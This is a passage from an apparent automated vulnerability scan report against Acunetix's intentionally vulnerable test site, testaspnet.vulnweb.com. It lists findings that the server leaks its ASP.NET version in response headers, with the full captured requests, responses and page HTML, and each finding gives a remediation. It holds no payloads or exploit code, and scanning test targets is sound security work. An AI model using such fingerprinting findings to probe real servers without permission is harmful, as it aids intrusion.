title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        14. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        15. GET http://testaspnet.vulnweb.com/rssFeed.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (220 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/xml; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2118
          
          
          Response body (2118 bytes)
          
          <rss version="2.0">
                <channel>
                  <title>Acunetix testaspnet</title>
                  <link>http://testaspnet.acunetix.com/</link>
                  <description>
                    This is the syndication feed for testaspnet.acunetix.com.
                  </description>
          
                  <item>
                    <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title>
                    <description>
                       Seamless OpenVAS integration now also available on Windows and Linux
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=0
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Thu, 16 May 2019 12:32:30 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Acunetix Web Vulnerability Scanner beta released!</title>
                    <description>
                       26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=3
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:37:35 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Web attacks - can your web applications withstand the force?</title>
                    <description>
                       21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=2
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:35:22 GMT
                     </pubDate>
                  </item>
            
                </channel>
              </rss>  
            
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        16. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
